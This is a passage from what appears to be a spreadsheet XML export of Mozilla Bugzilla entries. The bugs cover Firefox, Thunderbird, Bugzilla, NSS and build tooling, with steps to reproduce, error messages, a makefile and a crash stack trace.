xpfe/components/ucth/resources/helperAppDldProgress.js.  This is a function that
takes a string and converts it to an integer but it's being applied to numeric
arguments!  I am guessing this ends up doing a number-&gt;string conversion and
then a string-&gt;integer conversion.  In most cases we are doing
parseInt(foo+0.5) which is exactly equivalent to Math.round(foo) for positive foo.
Since all the values in question are positive (times completion percentages
amounts downloaded and such) it might make sense to use Math.round().</t>
  </si>
  <si>
    <t>MOZILLA.ORG-339252</t>
  </si>
  <si>
    <t>l10n CVS account for Jose Sun (zh-TW)</t>
  </si>
  <si>
    <t>Jose Sun volunteers to step in for our Firefox localization for traditional
chinese zh-TW. He's a buddy of the owner who's in military service right now.
I'm vouching for him.
Jose please attach an ssh public key for your CVS account and fax/snail mail
the CVS contributor form.</t>
  </si>
  <si>
    <t>SEAMONKEY-32009</t>
  </si>
  <si>
    <t xml:space="preserve">[about page] Change link to contributors page to </t>
  </si>
  <si>
    <t>Don't use the direct link to  but .</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-386393</t>
  </si>
  <si>
    <t>Unable to create a new mailing list</t>
  </si>
  <si>
    <t>Using today's thunderbird trunk build 
try creating a new mailing list. click OK. The dialog never goes away and the list is not created.
I get the following JS error in the console:
Error: [Exception... Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsIAbDirectory.dirName]  nsresult: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED)  location: JS frame :: chrome://messenger/content/addressbook/abMailListDialog.js :: GetListValue :: line 107  data: no]
Source File: chrome://messenger/content/addressbook/abMailListDialog.js
Line: 107
Kudos to chefChaudart on MZ for catching this.</t>
  </si>
  <si>
    <t>FIREFOX-508895</t>
  </si>
  <si>
    <t>tools/options advanced/general tab: Check Now refuses to take status as default</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)
I want FF3.5 to be my default browser.  This option is failing to take that status.  I had done some testing acrossChrome IE8 and FF3.5 Chrome took over as default immediately.  However after that IE8 was unable to grab or take the status as default browser and neither does FF3.5.  I also checked the check if FF is default browser on startup and it does not... I expect this is related to the not-default issue.
Reproducible: Always
Steps to Reproduce:
1.set Google Chrome as default browser.
2.open firefox 3.5.2 and go to the advanced group general tab on the tools/options... and attempt to make it the default browser
3.nothing happens
Actual Results:  
nothing
Expected Results:  
FF3.5.2 becomes the default browser</t>
  </si>
  <si>
    <t>baillargeon</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-277004</t>
  </si>
  <si>
    <t>Update packages list to reflect removed packages</t>
  </si>
  <si>
    <t>During a recent cygwin install on my laptop I noticed that the package
fileutils has been added to the category ZZZRemovedPackages with a comment
to install coreutils instead.  The listed requirements on the build page
should be updated to reflect this.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-528867</t>
  </si>
  <si>
    <t>blocking1.9.1 and blocking-fennec fields not working correctly</t>
  </si>
  <si>
    <t xml:space="preserve">I was looking at bug 516862 and I noticed blocking1.9.1 and blocking-fennec are both broken.
Here's an example:
    &lt;th class=field_label 
      id=field_label_cf_blocking_191&gt;
      blocking1.9.1:
&lt;td class=field_value 
    id=field_container_cf_blocking_191  colspan=2&gt;
        &lt;select id=cf_blocking_191 
                name=cf_blocking_191 
                &gt;
        &lt;!--
          initHidingOptionsForIE('cf_blocking_191')
        //--&gt;
    </t>
  </si>
  <si>
    <t>BUGZILLA-230293</t>
  </si>
  <si>
    <t>CSV needs to be sent with Content-Disposition: attachment</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031030
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031030
I don't know if its just me or my locale that makes this a problem but my
Windows defaults to  as CSV seperator (from Regional settings under control
panel).
Is it possible to change the  seperator manually in the current codebase
(2.17-6) or would it be possible to implement it as a user-config option?
Right now Excel refuses to acknowledge the columns when copy/pasting the text
from a buglist (Excel 2000).
Reproducible: Always
Steps to Reproduce:
1. Log-in
2. Press My Bugs
3. Press CSV
4. Press Ctrl-A + Ctrl-C
5. Switch to Excel
6. Press Ctrl-V
Actual Results:  
The whole text was included in column a. No subsequent columns was made.
Expected Results:  
1 column in excel / column in bug list</t>
  </si>
  <si>
    <t>akj</t>
  </si>
  <si>
    <t>CORE-40469</t>
  </si>
  <si>
    <t>JavaScript construct location.href = ... escapes non-ascii incorrectly</t>
  </si>
  <si>
    <t>Build 2000052408
RECIPE:
1. Select some item in the pick-list Produktgrupper: to the left.
A new pick-list is rendered with the default text VÃ¤lj undergrupp. Fine.
2. Try to select something from this new pick-list. You can't but it should
 really contain several items.</t>
  </si>
  <si>
    <t>CORE-75785</t>
  </si>
  <si>
    <t>Make Gecko accessible</t>
  </si>
  <si>
    <t>Meta bug for tracking work to make Gecko accessible to Assistive Technology
products.</t>
  </si>
  <si>
    <t>CORE-329529</t>
  </si>
  <si>
    <t>Unitialized rv variable in filter code</t>
  </si>
  <si>
    <t>An unitialized return result is causing filters not to sometimes not apply.</t>
  </si>
  <si>
    <t>SEAMONKEY-246263</t>
  </si>
  <si>
    <t>reserve more space for executable when using prebinding</t>
  </si>
  <si>
    <t>For Firefox static builds we need to move the base addresses of dependent
libraries up a bit or the executable runs into NSPR and the application does not
launch prebound.  The new addresses I'm using are still well within the
allowable range for application libraries (see
http://developer.apple.com/documentation/Performance/Conceptual/LaunchTime/Tasks/Prebinding.html)</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-459621</t>
  </si>
  <si>
    <t>xulrunner-stub is broken on windows</t>
  </si>
  <si>
    <t>Created attachment 342830
puts GetModuleFileNameW before the WideCharToMultiByte</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-474272</t>
  </si>
  <si>
    <t>please create proper watchable QA contacts for components in Mozilla Localizations</t>
  </si>
  <si>
    <t>af / Afrikaans
ar / Arabic
ast-ES / Asturian
bg / Bulgarian
bs-BA / Bosnian
ca / Catalan
cs / Czech
el / Greek
en-GB / English (United Kingdom)
en-ZA / English (South Africa)
es-AR / Spanish (Argentina)
es-ES / Spanish
fr / French
fy-NL / Frisian
ga-IE / Irish
gu-IN / Gujarati
hu / Hungarian
it / Italian
ja / Japanese
ka / Georgian
ko / Korean
ku / Kurdish
lt / Lithuanian
mn / Mongolian
MozillaTranslator
nr / Southern Ndebele
nso / Northern Sotho (Pedi)
Other
pa-IN / Punjabi
pl / Polish
pt-BR / Brazilian
pt-PT / Portuguese
ru / Russian
sk / Slovak
sq / Albanian
ss / Swazi
st / Southern Sotho
sv / Swedish
tn / Tswana
tr / Turkish
ts / Tsonga
ve / Venda
xh / Xhosa
za / South Africa
zh-CN / Chinese (Simplified)
zh-TW / Chinese (Traditional)
zu / Zulu</t>
  </si>
  <si>
    <t>NSS-488396</t>
  </si>
  <si>
    <t>DBM needs to be FIPS certifiable.</t>
  </si>
  <si>
    <t>The shared db/dbm split was made to try to remove code from the FIPS boundary. One way of doing that is to not FIPS validate the DBM code.
This would be fine normally as all the objects passed accross the sdb_ boundary (the interface to both sqlite and dbm) are all encrypted. The problem is DBM needs to decrypt that data and reencrypt it to preserve it's date interface. That means for dbm to be FIPS the legacy dbm code needs to be included in the FIPS boundary.
To date we believe the only thing that needs to happen to make this work is to include a .chk file and verify the dbm .so file when in FIPS mode.
This bug is for making that change and any other change needed by the lab.
bob</t>
  </si>
  <si>
    <t>NSS-196776</t>
  </si>
  <si>
    <t>The 'src' argument to the ASN.1 encoding functions should be declared 'const'</t>
  </si>
  <si>
    <t>The 'src' argument to the ASN.1 encoding functions (declared
in secasn1.h and defined in secasn1e.c) has the 'void *' type
right now.  It should have the 'const void *' type.</t>
  </si>
  <si>
    <t>SEAMONKEY-151770</t>
  </si>
  <si>
    <t>Can't associate Mozilla with .XBM images</t>
  </si>
  <si>
    <t>Now that bug 8031 has been fixed Mozilla can display XBM images but you can't
actually associate them with Mozilla in the advanced system pref panel.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-427534</t>
  </si>
  <si>
    <t>Tidy up the Address Book unit tests</t>
  </si>
  <si>
    <t>Created attachment 314084
The fix (diff -w)
As discussed with Dan in other bugs the testnum variable isn't that useful and just adds extra complexity. Additionally we are doing extra checks where they aren't actually required e.g. checking null from a queryInterface or getService (which Neil tells me will throw an error anyway).
So here's some general tidy up before I do bugs which need modifications to these.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-450991</t>
  </si>
  <si>
    <t>Number in Order Received column becomes negative when mail's offset in local mail folder file exceeds 2GB</t>
  </si>
  <si>
    <t>Created attachment 334216
Screen shot of negative number in Order Received column
&gt; [App] Name=Thunderbird Version=3.0b1pre BuildID=20080814031842
&gt;       ID={3550f703-e582-4d05-9a08-453d09bdfdc6}
&gt; [Gecko] MinVersion=1.9.1a2pre MaxVersion=1.9.1a2pre
&gt; On MS Win-XP SP3
Number in Order Received column becomes negative when mail's offset in local mail folder file exceeds 2GB.
Sort order is proper(sorted by value of 32bit unsigned integer). So it looks to be display only issue(treated as 32bit signed integer). Possibly due to common module for WinLinuxMac OS. (Mail folder file greater then 2GB is supported by NSPR for Win only)
Note:
This bug's problem is minor. But critical issues such as Bug 450359 really exist due to insuffient changes after support of mail folder file greater than 2GB.</t>
  </si>
  <si>
    <t>CORE-257195</t>
  </si>
  <si>
    <t>Relative URIs in  not working</t>
  </si>
  <si>
    <t>We weren't passing a baseURI so NS_NewURI was throwing out relative URIs.</t>
  </si>
  <si>
    <t>MARKETPLACE_GRAVEYARD-887328</t>
  </si>
  <si>
    <t>App debug API</t>
  </si>
  <si>
    <t>For bug 887324 we'll need an API in solitude that will return key debug information about an app. This is a bit sensitive so let's just return a few fields including:
- bango environment
- bangoid for the app
- packageid for the app</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-375283</t>
  </si>
  <si>
    <t>Enable cron job for updating AMO v3 download counts</t>
  </si>
  <si>
    <t>We will need to set up a cron job to update download counts for AMO v3 once we know things will be okay during peak load times -- Monday Tuesday?
The cron job is much like v2 except it has been modified to use the new schema.  The script is in ./bin/maintenance.php and has weekly and total count options.
See the current v2 cron job change the path and that should be it.</t>
  </si>
  <si>
    <t>CORE-74381</t>
  </si>
  <si>
    <t>Patch for styleSheets object exposed in xul a doc</t>
  </si>
  <si>
    <t>Hey Johnny i'm filing this bug to track the patch to expose the styleSheets
object as a property in a xul document.
I need this property to continue development on Chameleon.
As soon as you review and i tighten up the code some i will post the patch
here.
Thanks
--pete</t>
  </si>
  <si>
    <t>SEAMONKEY-190581</t>
  </si>
  <si>
    <t>NO_DIST_INSTALL should not install xpidl IDL and header files (PATCH)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20021207 Phoenix/0.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3a) Gecko/20021207 Phoenix/0.5
I'm writing a Makefile for a sample javascript XPCOM module (that I don't want
to be installed by default) and finding that rules.mk has doesn't do a good job
of following the NO_DIST_INSTALL flag.  Here's my Makefile:
 DEPTH		= ../../../../..
 topsrcdir	= @top_srcdir@
 srcdir		= @srcdir@
 VPATH		= @srcdir@
 NO_INSTALL=true
 NO_DIST_INSTALL=true
 MODULE=GenericModule
 include $(DEPTH)/config/autoconf.mk
 XPIDLSRCS = \
	 nsGenericModule.idl \
	 $(NULL)
 EXTRA_COMPONENTS = \
	 nsGenericModule.js \
	$(NULL)
 include $(topsrcdir)/config/rules.mk
And here's what I see when I make:
 root@first:/usr/local/src/phoenix/mozilla/js/src/xpconnect/loader/sample# make
 make export
 make[1]: Entering directory  
 `/usr/local/src/phoenix/mozilla/js/src/xpconnect/loader/sample'
 Creating _xpidlgen/.done
 nsGenericModule.idl
 ../../../../../dist/bin/xpidl -m header -w -I ../../../../../dist/idl -I. -o  
 _xpidlgen/nsGenericModule nsGenericModule.idl
 Creating ../../../../../dist/include/GenericModule
 make[1]: Leaving directory  
 `/usr/local/src/phoenix/mozilla/js/src/xpconnect/loader/sample'
 make libs
 make[1]: Entering directory 
 `/usr/local/src/phoenix/mozilla/js/src/xpconnect/loader/sample'
 nsGenericModule.idl
 ../../../../../dist/bin/xpidl -m typelib -w -I ../../../../../dist/idl -I. -o  
 _xpidlgen/nsGenericModule nsGenericModule.idl
 ../../../../../dist/bin/xpt_link _xpidlgen/GenericModule.xpt 
 _xpidlgen/nsGenericModule.xpt 
 make[1]: Leaving directory 
 `/usr/local/src/phoenix/mozilla/js/src/xpconnect/loader/sample'
Note in particular Creating ../../../../../dist/include/GenericModule.
Since the Makefile explicitly says NO_DIST_INSTALL nothing should be
installed in /dist/.
Patch follows.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-409995</t>
  </si>
  <si>
    <t>Flickr message after account creation</t>
  </si>
  <si>
    <t>Create an account on the new spreadfirefox.com click on the 1-time login URL to set your password the confirmation message includes the following: 's Flickr page has been deleted
The same thing happens when editing one's account (from the My Stuff-&gt;My Account page).
The message will be confusing to users who never entered a flickr identifier. Is it possible to remove it for those users?</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-525915</t>
  </si>
  <si>
    <t>Create partials and snippets for Firefox 3.5.3 -&gt; 3.5.5</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-283100</t>
  </si>
  <si>
    <t>Growl global notifications in Camino for completed downloads</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.2) Gecko/20040825 Camino/0.8.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.2) Gecko/20040825 Camino/0.8.1
When a download is completed Camino should post a Growl
notification. If you register the notifications
then the UI for turning it on and off and customizing it is in Growl.
1) This can be done without any new UI in Camino.
2) It's not slow.
Bug #282185 applies to Firefox.
- Growl (http://growl.info/)
(http://www.drunkenblog.com/drunkenblog-archives/000341.html)
- Growl is licensed under a BSD-style license
(http://growl.info/documentation/Growl-Main-License.txt).
- Documentation (http://growl.info/documentation/)
- Implementing Growl in Carbon applications
(http://growl.info/documentation/implementing-growl.php?lang=carbon)
- Self-proclaimed hack that does this in Firefox
(http://www.mrchucho.net/index.php/archives/2004/12/27/firefox-and-growl/)
Thank you.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>ishermandom+bugs</t>
  </si>
  <si>
    <t>spon0112</t>
  </si>
  <si>
    <t>BUGZILLA-280775</t>
  </si>
  <si>
    <t>Bug 277437 reversed the meaning of param(sendmailnow)</t>
  </si>
  <si>
    <t>MessageToMTA has the following:
    if (Param(maildeliverymethod) eq sendmail &amp;&amp; Param(sendmailnow)) {
        push @args -ODeliveryMode=deferred
    }
this reverses the meaning of sendmailnow.</t>
  </si>
  <si>
    <t>CORE-193606</t>
  </si>
  <si>
    <t>Cookie window grows (horizontally and vertically) every time on opening</t>
  </si>
  <si>
    <t>User-Agent:       Opera/7.02 Bork-edition (Windows NT 5.1 U)  [en]
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030210
When opening the cookie manager (Preferences - Privacy &amp; Security - Cookies - 
Manage cookies) or (Tools - Cookie Manager - Manage Stored Cookies) the cookie 
manager's window will grow in horizontal and vertical direction.
Reproducible: Always
Steps to Reproduce:
1.Preferences
2.Privacy &amp; Security
3.Cookies
4.Manage Cookies
Actual Results:  
Clicking this every time will only make it bigger until it fills the screen.
Expected Results:  
Remember the standard size (or saved one by user).</t>
  </si>
  <si>
    <t>alastor</t>
  </si>
  <si>
    <t>CORE-237957</t>
  </si>
  <si>
    <t>M17beta crash [@ nsAccessibleHyperText::nsAccessibleHyperText ]</t>
  </si>
  <si>
    <t>Set GNOME_ACCESSIBILITY=1 start mozilla and visit http://house.sinoi.com/
mozilla will crash. If you don't set GNOME_ACCESSIBILITY this website can
display correctly.</t>
  </si>
  <si>
    <t>BUGZILLA-44691</t>
  </si>
  <si>
    <t>Userregexp matching for new product should be case-insensitive</t>
  </si>
  <si>
    <t>In editproducts.cgi when creating a new product if the usebuggroups operating 
parameter is on then a new bug group is created for that product and any 
existing users matching the group's userregexp are added to the group.  However 
this pattern match appears to be case sensitive where it should be case 
insensitive (since login_names are email addresses and are case insensitive  
the match in InsertNewUser in globals.pl is case insensitive).  It's simple to 
fix but pretty important.  I'll attach a patch with the necessary change.</t>
  </si>
  <si>
    <t>jmrobins</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-473126</t>
  </si>
  <si>
    <t>restart build VMs after netapp outage</t>
  </si>
  <si>
    <t>bug#473113 caused any VM using netapp-c or netapp-d to fail. Disks are now back online so we are manually restarting the VMs and processes.
Tree is already closed for unrelated code crash so leaving tree closed.
nthomas has already revived production-master production-1.9-master and is working on qm-rhel02</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-178960</t>
  </si>
  <si>
    <t>Time announcements bugs with date etc should show GMT offset</t>
  </si>
  <si>
    <t>Time announcements should at least include the GMT offset.
Notes like the one that was being shown at 20:06 BRDT (GMT -02:00) Bugzilla
will be down for an upgrade on Friday November 8 from 6:00PM to midnight PST
means almost nothing to me. It only means that sometime in between November 8
and 9 Bugzilla will be down. I don't know what does PST mean and honestly I
don't care nor will you care what does BRDT mean now you have the GMT
offset. So the announcements should look like the following (  means optional):
(1)This bug is being written at 20:46  (GMT - 02:00)
or
(2)This bug is being written at 20:46  (22:00 GMT)
or using am/pm:
(3)This bug is being written at 08:46 pm  (GMT - 02:00)
or
(4)This bug is being written at 08:46 pm  (10:00 pm GMT)
or even only GMT:
(5)This bug is being written at 22:46 GMT
or
(6)This bug is being written at 10:46 pm GMT
My personal vote is for (2) or (5).</t>
  </si>
  <si>
    <t>jhmelman</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-369536</t>
  </si>
  <si>
    <t>Assignment to XML property removes attributes</t>
  </si>
  <si>
    <t>Not sure what all the cases are but the following test fails:
var x = bazOnebazTwo
TEST_XML(1 bazTwo x.bar[1])
x.bar[1] = bazTwoChanged
TEST_XML(2 bazTwoChanged x.bar[1])
... with output:
FAILED!: Section 2 of test -
FAILED!: Expected value:
FAILED!: bazTwoChanged
FAILED!: Actual value:
FAILED!: bazTwoChanged
This bug exists in both the new DOM and old XMLBeans implementations of E4X.</t>
  </si>
  <si>
    <t>inonit</t>
  </si>
  <si>
    <t>BUGZILLA-300978</t>
  </si>
  <si>
    <t>bad output when a non-cgi script dies</t>
  </si>
  <si>
    <t>It's a regression due to bug 283989. CGI.pm line 39 contains:
use CGI::Carp qw(fatalsToBrowser)
This makes non-cgi scripts to display HTML content when dying:
[root@antares bugzilla]# ./collectstats.pl
Content-type: text/html
Software error:
pomme at ./collectstats.pl line 57.
For help please send mail to this site's webmaster giving this error message
and the time and date of the error.
collectstats.pl use Bugzilla which use Bugzilla::CGI.
Removing this line completely looks like the best solution to me.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-459116</t>
  </si>
  <si>
    <t>AMO Localization (fy-NL)</t>
  </si>
  <si>
    <t>Similar to Bug 459105 this is a placeholder bug.  Wim offered to test Verbatim a bit but there is no Frisian locale in AMO yet so I'm going to add one.  I won't put it in the valid locales yet so it should just be another directory on the server.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-495261</t>
  </si>
  <si>
    <t>requesting license for Silverback</t>
  </si>
  <si>
    <t>THUNDERBIRD-466730</t>
  </si>
  <si>
    <t>file compact folders isn't compacting imap offline stores</t>
  </si>
  <si>
    <t>this is really a backend bug but I need to set the target milestones.</t>
  </si>
  <si>
    <t>TOOLKIT-468305</t>
  </si>
  <si>
    <t>nsINavBookmarksObserver has no onBeforeRemove callback</t>
  </si>
  <si>
    <t>It's not possible to register a callback for when an item is about to be removed but while it is still intact.
I suspect this has multiple potential uses but it bit me personally for Weave because I need to find out the GUID of an item when it is removed so that it can be removed on all profiles that sync with Weave.  The GUID is gone by the time onItemRemoved is called.
A related bug is that if you attempt to get the GUID during onItemRemoved (or manually via the error console) for the removed item Places will generate a new one on the spot for it instead of throwing an error.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-391258</t>
  </si>
  <si>
    <t>remove clean-report keyword</t>
  </si>
  <si>
    <t>The rationale per bug 180813 appears to be using clean-report to distinguish unco filed in new state by canconfirm because they can from actually confirmed bugs. The actual use of clean-report seems to mostly be ironically any reporter setting it because they can. That produces at most useless work and useless bugmail.
(cc is people who've added the kw as non-reporter on the theory they might know who they were adding it for)</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-380132</t>
  </si>
  <si>
    <t>mac tinderbox clocks are wrong</t>
  </si>
  <si>
    <t>It's about 15 minutes in the future at the moment so you get warnings when pushing symbols up to the talkback server.
What's our standard time-syncing solution for Macs ?</t>
  </si>
  <si>
    <t>CORE-127128</t>
  </si>
  <si>
    <t>table does not split while printing</t>
  </si>
  <si>
    <t>table does not split while printing so on some pages the table following the
header displays on the next page. IE fails here too.
will attach a somehow reduced testcase</t>
  </si>
  <si>
    <t>SEAMONKEY-218517</t>
  </si>
  <si>
    <t>Pref needed: tabbed browser window 'Are you sure?' close confirmation dialog box when multiple open tabs are going to close preference</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
There should be a preference (default: enabled IMO) to enable an 'Are you
sure?' confirmation dialog box when a window is closed that has multible tabs
open.  
For the umpteenth time I closed a window when I meant to close a tab.  Arrgh!  
Lost posts I was in the middle of editing forms I'd partly filled...
Reproducible: Always
Steps to Reproduce:
Open a window with several tabs close the window.
Actual Results:  
The window and all the tabs close. 
Expected Results:  
Confirm that I really wanted to close all the tabs.
I've looked through about:config and
http://www.mozilla.org/unix/customizing.html#prefs
and don't see an extant pref.
The UI would probably go in 
In Preferences...Navigator...Tabbed Browsing
Perhaps 
browser.tabs.confirmMultiTabClose boolean?  
(or something more generic - browser.confirmClose: 0= confirm nothing 1=
confirm MultiTabClose 2= confirm all manual closures) 
This bug is causing me to lose data but the fix is an enhancement I'll leave
it as severity normal as a compromise?</t>
  </si>
  <si>
    <t>bugzillaPost120030in</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-235445</t>
  </si>
  <si>
    <t>1.7a Release Notes Installation Extras plugin dir incorrect</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20040219
Windows: If you're using the Installer build and you already have a compatible
JRE on your system Mozilla should recognize it. If you've manually set the
preference to disable automatic plugin searches then you can do the following to
get Java working: After the JRE is installed on your machine copy NPOJI610.dll
from the install directory (something like C:\Program
Files\JavaSoft\JRE\\bin) to your Mozilla plugins directory (something
like C:\Program Files\mozilla.org\bin\plugins).
Mozilla plugins directory (something like C:\Program
Files\mozilla.org\bin\plugins). 
MOST BE:Mozilla plugins directory (something like C:\Program
Files\mozilla.org\Mozilla\plugins). 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>lars.nolmans</t>
  </si>
  <si>
    <t>CORE-24193</t>
  </si>
  <si>
    <t>crash closing window in nsURILoader::DispatchContent</t>
  </si>
  <si>
    <t>I clicked the close box on a window and got the following crash:
nsURILoader::DispatchContent(nsURILoader * const 0x012e8de0 const char *
0x02a4ef30 int 0x00000000 const char * 0x100782d0 gCommonEmptyBuffer
nsIChannel * 0x02a4a8d0 nsISupports * 0x00000000 nsIURIContentListener *
0x0290b6dc char * * 0x0012c998 nsIURIContentListener * * 0x0012c9a0) line 539
+ 29 bytes
nsDocumentOpenInfo::DispatchContent(nsIChannel * 0x02a4a8d0 nsISupports *
0x00000000) line 273 + 146 bytes
nsDocumentOpenInfo::OnStartRequest(nsDocumentOpenInfo * const 0x0283f5c0
nsIChannel * 0x02a4a8d0 nsISupports * 0x00000000) line 221 + 16 bytes
nsCachedChromeChannel::AsyncRead(nsCachedChromeChannel * const 0x02a4a8d0
unsigned int 0x00000000 int 0xffffffff nsISupports * 0x00000000
nsIStreamListener * 0x0283f5c0) line 170 + 20 bytes
nsDocumentOpenInfo::Open(nsIURI * 0x02c4bbe0 int 0x00000000 const char *
0x00000000 nsISupports * 0x0290b6c0 nsIURI * 0x00000000 nsIInputStream *
0x00000000 nsISupports * 0x029089e0 nsISupports * * 0x0012cba4) line 212 + 42
bytes
nsURILoader::OpenURIWithPostDataVia(nsURILoader * const 0x012e8de4 nsIURI *
0x02c4bbe0 int 0x00000000 const char * 0x00000000 nsISupports * 0x0290b6c0
nsIURI * 0x00000000 nsIInputStream * 0x00000000 nsISupports * 0x029089e0
nsISupports * * 0x0012cba4 unsigned int 0x00000000) line 500 + 40 bytes
nsURILoader::OpenURIVia(nsURILoader * const 0x012e8de0 nsIURI * 0x02c4bbe0
int 0x00000000 const char * 0x00000000 nsISupports * 0x0290b6c0 nsIURI *
0x00000000 nsISupports * 0x029089e0 nsISupports * * 0x0012cba4 unsigned int
0x00000000) line 458
nsURILoader::OpenURI(nsURILoader * const 0x012e8de0 nsIURI * 0x02c4bbe0 int
0x00000000 const char * 0x00000000 nsISupports * 0x0290b6c0 nsIURI *
0x00000000 nsISupports * 0x029089e0 nsISupports * * 0x0012cba4) line 444
nsDocLoaderImpl::LoadDocument(nsDocLoaderImpl * const 0x0290b0e0 nsIURI *
0x02c4bbe0 const char * 0x00380684 nsISupports * 0x0290b6c0 nsIInputStream *
0x00000000 nsISupports * 0x00000000 unsigned int 0x00000000 const unsigned
int 0x00000000 const unsigned short * 0x00000000) line 384 + 75 bytes
nsWebShell::DoLoadURL(nsIURI * 0x02c4bbe0 const char * 0x00380684
nsIInputStream * 0x00000000 unsigned int 0x00000000 const unsigned int
0x00000000 const unsigned short * 0x00000000 int 0x00000001) line 1677 + 101
bytes
nsWebShell::LoadURI(nsWebShell * const 0x0290b6c0 nsIURI * 0x02c4bbe0 const
char * 0x00380684 nsIInputStream * 0x00000000 int 0x00000001 unsigned int
0x00000000 const unsigned int 0x00000000 nsISupports * 0x00000000 const
unsigned short * 0x00000000) line 1949 + 40 bytes
nsWebShell::LoadURL(nsWebShell * const 0x0290b6c0 const unsigned short *
0x02c42980 const char * 0x00380684 nsIInputStream * 0x00000000 int
0x00000001 unsigned int 0x00000000 const unsigned int 0x00000000 nsISupports
* 0x00000000 const unsigned short * 0x00000000) line 2180 + 52 bytes
nsWebShell::LoadURL(nsWebShell * const 0x0290b6c0 const unsigned short *
0x02c42980 nsIInputStream * 0x00000000 int 0x00000001 unsigned int
0x00000000 const unsigned int 0x00000000 nsISupports * 0x00000000 const
unsigned short * 0x00000000) line 1485
nsHTMLFrameInnerFrame::ReloadURL() line 951 + 66 bytes
nsHTMLFrameOuterFrame::AttributeChanged(nsHTMLFrameOuterFrame * const
0x020a0498 nsIPresContext * 0x02b204a0 nsIContent * 0x02c42cbc int
0x00000000 nsIAtom * 0x015e5ed0 {src} int 0x00000002) line 414
nsCSSFrameConstructor::AttributeChanged(nsCSSFrameConstructor * const
0x02b9a9b0 nsIPresContext * 0x02b204a0 nsIContent * 0x02c42cbc int
0x00000000 nsIAtom * 0x015e5ed0 {src} int 0x00000002) line 7615 + 35 bytes
StyleSetImpl::AttributeChanged(StyleSetImpl * const 0x02b9aa50 nsIPresContext
* 0x02b204a0 nsIContent * 0x02c42cbc int 0x00000000 nsIAtom * 0x015e5ed0
{src} int 0xffffffff) line 996
PresShell::AttributeChanged(PresShell * const 0x02b9a7b8 nsIDocument *
0x02b21ad0 nsIContent * 0x02c42cbc int 0x00000000 nsIAtom * 0x015e5ed0
{src} int 0xffffffff) line 2385 + 57 bytes
nsXULDocument::AttributeChanged(nsXULDocument * const 0x02b21ad0 nsIContent *
0x02c42cbc int 0x00000000 nsIAtom * 0x015e5ed0 {src} int 0xffffffff) line
1394
nsGenericHTMLElement::SetAttribute(int 0x00000000 nsIAtom * 0x015e5ed0
{src} const nsString &amp; {chrome://related/content/related-panel.xul} int
0x00000001) line 734
nsHTMLIFrameElement::SetAttribute(nsHTMLIFrameElement * const 0x02c42cbc int
0x00000000 nsIAtom * 0x015e5ed0 {src} const nsString &amp;
{chrome://related/content/related-panel.xul} int 0x00000001) line 89 + 30
bytes
nsGenericElement::SetAttribute(const nsString &amp; {src} const nsString &amp;
{chrome://related/content/related-panel.xul}) line 426 + 32 bytes
nsGenericHTMLElement::SetAttribute(const nsString &amp; {src} const nsString &amp;
{chrome://related/content/related-panel.xul}) line 80
nsHTMLIFrameElement::SetAttribute(nsHTMLIFrameElement * const 0x02c42cb0 const
nsString &amp; {src} const nsString &amp;
{chrome://related/content/related-panel.xul}) line 55 + 22 bytes
ElementSetAttribute(JSContext * 0x02b26e90 JSObject * 0x0205e5e0 unsigned int
0x00000002 long * 0x0201b014 long * 0x0012db68) line 263 + 26 bytes
js_Invoke(JSContext * 0x02b26e90 unsigned int 0x00000002 unsigned int
0x00000000) line 665 + 26 bytes
js_Interpret(JSContext * 0x02b26e90 long * 0x0012e3d8) line 2226 + 15 bytes
